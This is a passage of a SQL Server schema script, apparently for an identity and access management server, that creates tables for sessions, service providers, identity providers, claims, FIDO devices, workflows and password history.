IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_TEMP_SESSION_STORE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_TEMP_SESSION_STORE (
SESSION_ID VARCHAR (100) NOT NULL,
SESSION_TYPE VARCHAR(100) NOT NULL,
OPERATION VARCHAR(10) NOT NULL,
SESSION_OBJECT VARBINARY(MAX),
TIME_CREATED BIGINT,
TENANT_ID INTEGER DEFAULT -1,
EXPIRY_TIME BIGINT,
PRIMARY KEY (SESSION_ID, SESSION_TYPE, TIME_CREATED, OPERATION)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_USER]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_USER (
USER_ID VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
DOMAIN_NAME VARCHAR(255) NOT NULL,
IDP_ID INTEGER NOT NULL,
PRIMARY KEY (USER_ID),
CONSTRAINT USER_STORE_CONSTRAINT UNIQUE (USER_NAME, TENANT_ID, DOMAIN_NAME, IDP_ID));
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_USER_SESSION_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_USER_SESSION_MAPPING (
USER_ID VARCHAR(255) NOT NULL,
SESSION_ID VARCHAR(255) NOT NULL,
CONSTRAINT USER_SESSION_STORE_CONSTRAINT UNIQUE (USER_ID, SESSION_ID));
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_APP]') AND TYPE IN (N'U'))
CREATE TABLE SP_APP (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
APP_NAME VARCHAR (255) NOT NULL ,
USER_STORE VARCHAR (255) NOT NULL,
USERNAME VARCHAR (255) NOT NULL ,
DESCRIPTION VARCHAR (1024),
ROLE_CLAIM VARCHAR (512),
AUTH_TYPE VARCHAR (255) NOT NULL,
PROVISIONING_USERSTORE_DOMAIN VARCHAR (512),
IS_LOCAL_CLAIM_DIALECT CHAR(1) DEFAULT '1',
IS_SEND_LOCAL_SUBJECT_ID CHAR(1) DEFAULT '0',
IS_SEND_AUTH_LIST_OF_IDPS CHAR(1) DEFAULT '0',
IS_USE_TENANT_DOMAIN_SUBJECT CHAR(1) DEFAULT '1',
IS_USE_USER_DOMAIN_SUBJECT CHAR(1) DEFAULT '1',
ENABLE_AUTHORIZATION CHAR(1) DEFAULT '0',
SUBJECT_CLAIM_URI VARCHAR (512),
IS_SAAS_APP CHAR(1) DEFAULT '0',
IS_DUMB_MODE CHAR(1) DEFAULT '0',
UUID CHAR(36),
IMAGE_URL VARCHAR(1024),
ACCESS_URL VARCHAR(1024),
IS_DISCOVERABLE CHAR(1) DEFAULT '0',
PRIMARY KEY (ID),
CONSTRAINT APPLICATION_NAME_CONSTRAINT UNIQUE(APP_NAME, TENANT_ID),
CONSTRAINT APPLICATION_UUID_CONSTRAINT UNIQUE(UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_METADATA]') AND TYPE IN (N'U'))
CREATE TABLE SP_METADATA (
ID INTEGER IDENTITY,
SP_ID INTEGER,
NAME VARCHAR(255) NOT NULL,
VALUE VARCHAR(255) NOT NULL,
DISPLAY_NAME VARCHAR(255),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (ID),
CONSTRAINT SP_METADATA_CONSTRAINT UNIQUE (SP_ID, NAME),
FOREIGN KEY (SP_ID) REFERENCES SP_APP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_INBOUND_AUTH]') AND TYPE IN (N'U'))
CREATE TABLE SP_INBOUND_AUTH (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
INBOUND_AUTH_KEY VARCHAR (255),
INBOUND_AUTH_TYPE VARCHAR (255) NOT NULL,
INBOUND_CONFIG_TYPE VARCHAR (255) NOT NULL,
PROP_NAME VARCHAR (255),
PROP_VALUE VARCHAR (1024) ,
APP_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT APPLICATION_ID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_AUTH_STEP]') AND TYPE IN (N'U'))
CREATE TABLE SP_AUTH_STEP (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
STEP_ORDER INTEGER DEFAULT 1,
APP_ID INTEGER NOT NULL,
IS_SUBJECT_STEP CHAR(1) DEFAULT '0',
IS_ATTRIBUTE_STEP CHAR(1) DEFAULT '0',
PRIMARY KEY (ID),
CONSTRAINT APPLICATION_ID_CONSTRAINT_STEP FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_FEDERATED_IDP]') AND TYPE IN (N'U'))
CREATE TABLE SP_FEDERATED_IDP (
ID INTEGER NOT NULL,
TENANT_ID INTEGER NOT NULL,
AUTHENTICATOR_ID INTEGER NOT NULL,
PRIMARY KEY (ID, AUTHENTICATOR_ID),
CONSTRAINT STEP_ID_CONSTRAINT FOREIGN KEY (ID) REFERENCES SP_AUTH_STEP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_CLAIM_DIALECT]') AND TYPE IN (N'U'))
CREATE TABLE SP_CLAIM_DIALECT (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
SP_DIALECT VARCHAR (512) NOT NULL,
APP_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT DIALECTID_APPID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_CLAIM_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE SP_CLAIM_MAPPING (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
IDP_CLAIM VARCHAR (512) NOT NULL ,
SP_CLAIM VARCHAR (512) NOT NULL ,
APP_ID INTEGER NOT NULL,
IS_REQUESTED VARCHAR(128) DEFAULT '0',
IS_MANDATORY VARCHAR(128) DEFAULT '0',
DEFAULT_VALUE VARCHAR(255),
PRIMARY KEY (ID),
CONSTRAINT CLAIMID_APPID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_ROLE_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE SP_ROLE_MAPPING (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
IDP_ROLE VARCHAR (255) NOT NULL ,
SP_ROLE VARCHAR (255) NOT NULL ,
APP_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT ROLEID_APPID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_REQ_PATH_AUTHENTICATOR]') AND TYPE IN (N'U'))
CREATE TABLE SP_REQ_PATH_AUTHENTICATOR (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
AUTHENTICATOR_NAME VARCHAR (255) NOT NULL ,
APP_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT REQ_AUTH_APPID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_PROVISIONING_CONNECTOR]') AND TYPE IN (N'U'))
CREATE TABLE SP_PROVISIONING_CONNECTOR (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
IDP_NAME VARCHAR (255) NOT NULL ,
CONNECTOR_NAME VARCHAR (255) NOT NULL ,
APP_ID INTEGER NOT NULL,
IS_JIT_ENABLED CHAR(1) NOT NULL DEFAULT '0',
BLOCKING CHAR(1) NOT NULL DEFAULT '0',
RULE_ENABLED CHAR(1) NOT NULL DEFAULT '0',
PRIMARY KEY (ID),
CONSTRAINT PRO_CONNECTOR_APPID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS(SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_AUTH_SCRIPT]') AND TYPE IN (N'U'))
CREATE TABLE SP_AUTH_SCRIPT (
ID INTEGER IDENTITY NOT NULL,
TENANT_ID INTEGER NOT NULL,
APP_ID INTEGER NOT NULL,
TYPE VARCHAR(255) NOT NULL,
CONTENT VARBINARY(MAX) DEFAULT NULL,
IS_ENABLED CHAR(1) NOT NULL DEFAULT '0',
PRIMARY KEY (ID)
);
IF NOT EXISTS(SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_TEMPLATE]') AND TYPE IN (N'U'))
CREATE TABLE SP_TEMPLATE (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023),
CONTENT VARBINARY(MAX) DEFAULT NULL,
PRIMARY KEY (ID),
CONSTRAINT SP_TEMPLATE_CONSTRAINT UNIQUE (TENANT_ID, NAME)
);
IF NOT EXISTS(SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_WAIT_STATUS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_WAIT_STATUS (
ID INTEGER IDENTITY NOT NULL,
TENANT_ID INTEGER NOT NULL,
LONG_WAIT_KEY VARCHAR(255) NOT NULL,
WAIT_STATUS CHAR(1) NOT NULL DEFAULT '1',
TIME_CREATED DATETIME,
EXPIRE_TIME DATETIME,
PRIMARY KEY (ID),
CONSTRAINT IDN_AUTH_WAIT_STATUS_KEY UNIQUE (LONG_WAIT_KEY)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP]') AND TYPE IN (N'U'))
CREATE TABLE IDP (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
NAME VARCHAR(254) NOT NULL,
IS_ENABLED CHAR(1) NOT NULL DEFAULT '1',
IS_PRIMARY CHAR(1) NOT NULL DEFAULT '0',
HOME_REALM_ID VARCHAR(254),
IMAGE VARBINARY(MAX),
CERTIFICATE VARBINARY(MAX),
ALIAS VARCHAR(254),
INBOUND_PROV_ENABLED CHAR(1) NOT NULL DEFAULT '0',
INBOUND_PROV_USER_STORE_ID VARCHAR(254),
USER_CLAIM_URI VARCHAR(254),
ROLE_CLAIM_URI VARCHAR(254),
DESCRIPTION VARCHAR(1024),
DEFAULT_AUTHENTICATOR_NAME VARCHAR(254),
DEFAULT_PRO_CONNECTOR_NAME VARCHAR(254),
PROVISIONING_ROLE VARCHAR(128),
IS_FEDERATION_HUB CHAR(1) NOT NULL DEFAULT '0',
IS_LOCAL_CLAIM_DIALECT CHAR(1) NOT NULL DEFAULT '0',
PRIMARY KEY (ID),
DISPLAY_NAME VARCHAR(255),
IMAGE_URL VARCHAR(1024),
UUID CHAR(36) NOT NULL,
UNIQUE (TENANT_ID, NAME),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_ROLE]') AND TYPE IN (N'U'))
CREATE TABLE IDP_ROLE (
ID INTEGER IDENTITY,
IDP_ID INTEGER,
TENANT_ID INTEGER,
ROLE VARCHAR(254),
PRIMARY KEY (ID),
UNIQUE (IDP_ID, ROLE),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_ROLE_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDP_ROLE_MAPPING (
ID INTEGER IDENTITY,
IDP_ROLE_ID INTEGER,
TENANT_ID INTEGER,
USER_STORE_ID VARCHAR (253),
LOCAL_ROLE VARCHAR(253),
PRIMARY KEY (ID),
UNIQUE (IDP_ROLE_ID, TENANT_ID, USER_STORE_ID, LOCAL_ROLE),
FOREIGN KEY (IDP_ROLE_ID) REFERENCES IDP_ROLE(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_CLAIM]') AND TYPE IN (N'U'))
CREATE TABLE IDP_CLAIM (
ID INTEGER IDENTITY,
IDP_ID INTEGER,
TENANT_ID INTEGER,
CLAIM VARCHAR(254),
PRIMARY KEY (ID),
UNIQUE (IDP_ID, CLAIM),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_CLAIM_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDP_CLAIM_MAPPING (
ID INTEGER IDENTITY,
IDP_CLAIM_ID INTEGER,
TENANT_ID INTEGER,
LOCAL_CLAIM VARCHAR(253),
DEFAULT_VALUE VARCHAR(255),
IS_REQUESTED VARCHAR(128) DEFAULT '0',
PRIMARY KEY (ID),
UNIQUE (IDP_CLAIM_ID, TENANT_ID, LOCAL_CLAIM),
FOREIGN KEY (IDP_CLAIM_ID) REFERENCES IDP_CLAIM(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_AUTHENTICATOR]') AND TYPE IN (N'U'))
CREATE TABLE IDP_AUTHENTICATOR (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
IDP_ID INTEGER,
NAME VARCHAR(255) NOT NULL,
IS_ENABLED CHAR (1) DEFAULT '1',
DISPLAY_NAME VARCHAR(255),
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, IDP_ID, NAME),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_METADATA]') AND TYPE IN (N'U'))
CREATE TABLE IDP_METADATA (
ID INTEGER IDENTITY,
IDP_ID INTEGER,
NAME VARCHAR(255) NOT NULL,
VALUE VARCHAR(255) NOT NULL,
DISPLAY_NAME VARCHAR(255),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (ID),
CONSTRAINT IDP_METADATA_CONSTRAINT UNIQUE (IDP_ID, NAME),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_AUTHENTICATOR_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE IDP_AUTHENTICATOR_PROPERTY (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
AUTHENTICATOR_ID INTEGER,
PROPERTY_KEY VARCHAR(255) NOT NULL,
PROPERTY_VALUE VARCHAR(2047),
IS_SECRET CHAR (1) DEFAULT '0',
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, AUTHENTICATOR_ID, PROPERTY_KEY),
FOREIGN KEY (AUTHENTICATOR_ID) REFERENCES IDP_AUTHENTICATOR(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_PROVISIONING_CONFIG]') AND TYPE IN (N'U'))
CREATE TABLE IDP_PROVISIONING_CONFIG (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
IDP_ID INTEGER,
PROVISIONING_CONNECTOR_TYPE VARCHAR(255) NOT NULL,
IS_ENABLED CHAR (1) DEFAULT '0',
IS_BLOCKING CHAR (1) DEFAULT '0',
IS_RULES_ENABLED CHAR (1) DEFAULT '0',
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, IDP_ID, PROVISIONING_CONNECTOR_TYPE),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_PROV_CONFIG_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE IDP_PROV_CONFIG_PROPERTY (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
PROVISIONING_CONFIG_ID INTEGER,
PROPERTY_KEY VARCHAR(255) NOT NULL,
PROPERTY_VALUE VARCHAR(2048),
PROPERTY_BLOB_VALUE VARBINARY(MAX),
PROPERTY_TYPE CHAR(32) NOT NULL,
IS_SECRET CHAR (1) DEFAULT '0',
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, PROVISIONING_CONFIG_ID, PROPERTY_KEY),
FOREIGN KEY (PROVISIONING_CONFIG_ID) REFERENCES IDP_PROVISIONING_CONFIG(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_PROVISIONING_ENTITY]') AND TYPE IN (N'U'))
CREATE TABLE IDP_PROVISIONING_ENTITY (
ID INTEGER IDENTITY,
PROVISIONING_CONFIG_ID INTEGER,
ENTITY_TYPE VARCHAR(255) NOT NULL,
ENTITY_LOCAL_USERSTORE VARCHAR(255) NOT NULL,
ENTITY_NAME VARCHAR(255) NOT NULL,
ENTITY_VALUE VARCHAR(255),
TENANT_ID INTEGER,
ENTITY_LOCAL_ID VARCHAR(255),
PRIMARY KEY (ID),
UNIQUE (ENTITY_TYPE, TENANT_ID, ENTITY_LOCAL_USERSTORE, ENTITY_NAME, PROVISIONING_CONFIG_ID),
UNIQUE (PROVISIONING_CONFIG_ID, ENTITY_TYPE, ENTITY_VALUE),
FOREIGN KEY (PROVISIONING_CONFIG_ID) REFERENCES IDP_PROVISIONING_CONFIG(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_LOCAL_CLAIM]') AND TYPE IN (N'U'))
CREATE TABLE IDP_LOCAL_CLAIM (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
IDP_ID INTEGER,
CLAIM_URI VARCHAR(255) NOT NULL,
DEFAULT_VALUE VARCHAR(255),
IS_REQUESTED VARCHAR(128) DEFAULT '0',
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, IDP_ID, CLAIM_URI),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_ASSOCIATED_ID]') AND TYPE IN (N'U'))
CREATE TABLE IDN_ASSOCIATED_ID (
ID INTEGER IDENTITY,
IDP_USER_ID VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT -1234,
IDP_ID INTEGER NOT NULL,
DOMAIN_NAME VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(255) NOT NULL,
ASSOCIATION_ID CHAR(36) NOT NULL,
PRIMARY KEY (ID),
UNIQUE(IDP_USER_ID, TENANT_ID, IDP_ID),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_USER_ACCOUNT_ASSOCIATION]') AND TYPE IN (N'U'))
CREATE TABLE IDN_USER_ACCOUNT_ASSOCIATION (
ASSOCIATION_KEY VARCHAR(255) NOT NULL,
TENANT_ID INTEGER,
DOMAIN_NAME VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(255) NOT NULL,
PRIMARY KEY (TENANT_ID, DOMAIN_NAME, USER_NAME)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[FIDO_DEVICE_STORE]') AND TYPE IN (N'U'))
CREATE TABLE FIDO_DEVICE_STORE (
TENANT_ID INTEGER,
DOMAIN_NAME VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(45) NOT NULL,
TIME_REGISTERED DATETIME,
KEY_HANDLE VARCHAR(200) NOT NULL,
DEVICE_DATA VARCHAR(2048) NOT NULL,
PRIMARY KEY (TENANT_ID, DOMAIN_NAME, USER_NAME, KEY_HANDLE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[FIDO2_DEVICE_STORE]') AND TYPE IN (N'U'))
CREATE TABLE FIDO2_DEVICE_STORE (
TENANT_ID INTEGER,
DOMAIN_NAME VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(45) NOT NULL,
TIME_REGISTERED DATETIME,
USER_HANDLE VARCHAR(64) NOT NULL,
CREDENTIAL_ID VARCHAR(200) NOT NULL,
PUBLIC_KEY_COSE VARCHAR(1024) NOT NULL,
SIGNATURE_COUNT BIGINT,
USER_IDENTITY VARCHAR(512) NOT NULL,
DISPLAY_NAME VARCHAR(255),
IS_USERNAMELESS_SUPPORTED CHAR(1) DEFAULT '0',
PRIMARY KEY (CREDENTIAL_ID, USER_HANDLE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_REQUEST]') AND TYPE IN (N'U'))
CREATE TABLE WF_REQUEST (
UUID VARCHAR (45),
CREATED_BY VARCHAR (255),
TENANT_ID INTEGER DEFAULT -1,
OPERATION_TYPE VARCHAR (50),
CREATED_AT DATETIME,
UPDATED_AT DATETIME,
STATUS VARCHAR (30),
REQUEST VARBINARY(MAX),
PRIMARY KEY (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_BPS_PROFILE]') AND TYPE IN (N'U'))
CREATE TABLE WF_BPS_PROFILE (
PROFILE_NAME VARCHAR(45),
HOST_URL_MANAGER VARCHAR(255),
HOST_URL_WORKER VARCHAR(255),
USERNAME VARCHAR(45),
PASSWORD VARCHAR(1023),
CALLBACK_HOST VARCHAR (45),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (PROFILE_NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_WORKFLOW]') AND TYPE IN (N'U'))
CREATE TABLE WF_WORKFLOW(
ID VARCHAR (45),
WF_NAME VARCHAR (45),
DESCRIPTION VARCHAR (255),
TEMPLATE_ID VARCHAR (45),
IMPL_ID VARCHAR (45),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_WORKFLOW_ASSOCIATION]') AND TYPE IN (N'U'))
CREATE TABLE WF_WORKFLOW_ASSOCIATION(
ID INTEGER NOT NULL IDENTITY ,
ASSOC_NAME VARCHAR (45),
EVENT_ID VARCHAR(45),
ASSOC_CONDITION VARCHAR (2000),
WORKFLOW_ID VARCHAR (45),
IS_ENABLED CHAR (1) DEFAULT '1',
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY(ID),
FOREIGN KEY (WORKFLOW_ID) REFERENCES WF_WORKFLOW(ID)ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_WORKFLOW_CONFIG_PARAM]') AND TYPE IN (N'U'))
CREATE TABLE WF_WORKFLOW_CONFIG_PARAM(
WORKFLOW_ID VARCHAR (45),
PARAM_NAME VARCHAR (45),
PARAM_VALUE VARCHAR (1000),
PARAM_QNAME VARCHAR (45),
PARAM_HOLDER VARCHAR (45),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (WORKFLOW_ID, PARAM_NAME, PARAM_QNAME, PARAM_HOLDER),
FOREIGN KEY (WORKFLOW_ID) REFERENCES WF_WORKFLOW(ID)ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_REQUEST_ENTITY_RELATIONSHIP]') AND TYPE IN (N'U'))
CREATE TABLE WF_REQUEST_ENTITY_RELATIONSHIP(
REQUEST_ID VARCHAR (45),
ENTITY_NAME VARCHAR (255),
ENTITY_TYPE VARCHAR (50),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY(REQUEST_ID, ENTITY_NAME, ENTITY_TYPE, TENANT_ID),
FOREIGN KEY (REQUEST_ID) REFERENCES WF_REQUEST(UUID)ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_WORKFLOW_REQUEST_RELATION]') AND TYPE IN (N'U'))
CREATE TABLE WF_WORKFLOW_REQUEST_RELATION(
RELATIONSHIP_ID VARCHAR (45),
WORKFLOW_ID VARCHAR (45),
REQUEST_ID VARCHAR (45),
UPDATED_AT DATETIME,
STATUS VARCHAR (30),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (RELATIONSHIP_ID),
FOREIGN KEY (WORKFLOW_ID) REFERENCES WF_WORKFLOW(ID)ON DELETE CASCADE,
FOREIGN KEY (REQUEST_ID) REFERENCES WF_REQUEST(UUID)ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_RECOVERY_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_RECOVERY_DATA (
USER_NAME VARCHAR(255) NOT NULL,
USER_DOMAIN VARCHAR(127) NOT NULL,
TENANT_ID INTEGER DEFAULT -1,
CODE VARCHAR(255) NOT NULL,
SCENARIO VARCHAR(255) NOT NULL,
STEP VARCHAR(127) NOT NULL,
TIME_CREATED DATETIME NOT NULL,
REMAINING_SETS VARCHAR(2500) DEFAULT NULL,
PRIMARY KEY(USER_NAME, USER_DOMAIN, TENANT_ID, SCENARIO,STEP),
UNIQUE(CODE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_PASSWORD_HISTORY_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_PASSWORD_HISTORY_DATA (
ID INTEGER NOT NULL IDENTITY ,
USER_NAME VARCHAR(255) NOT NULL,
USER_DOMAIN VARCHAR(127) NOT NULL,
TENANT_ID INTEGER DEFAULT -1,
SALT_VALUE VARCHAR(255),
HASH VARCHAR(255) NOT NULL,
TIME_CREATED DATETIME NOT NULL,
PRIMARY KEY (ID),
UNIQUE (USER_NAME,USER_DOMAIN,TENANT_ID,SALT_VALUE,HASH),
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CLAIM_DIALECT]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CLAIM_DIALECT (
ID INTEGER NOT NULL IDENTITY,
DIALECT_URI VARCHAR (255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT DIALECT_URI_CONSTRAINT UNIQUE (DIALECT_URI, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CLAIM]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CLAIM (
ID INTEGER NOT NULL IDENTITY,
DIALECT_ID INTEGER NOT NULL,
CLAIM_URI VARCHAR (255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (DIALECT_ID) REFERENCES IDN_CLAIM_DIALECT(ID) ON DELETE CASCADE,
CONSTRAINT CLAIM_URI_CONSTRAINT UNIQUE (DIALECT_ID, CLAIM_URI, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CLAIM_MAPPED_ATTRIBUTE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CLAIM_MAPPED_ATTRIBUTE (
ID INTEGER NOT NULL IDENTITY,
LOCAL_CLAIM_ID INTEGER,
USER_STORE_DOMAIN_NAME VARCHAR (255) NOT NULL,
ATTRIBUTE_NAME VARCHAR (255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
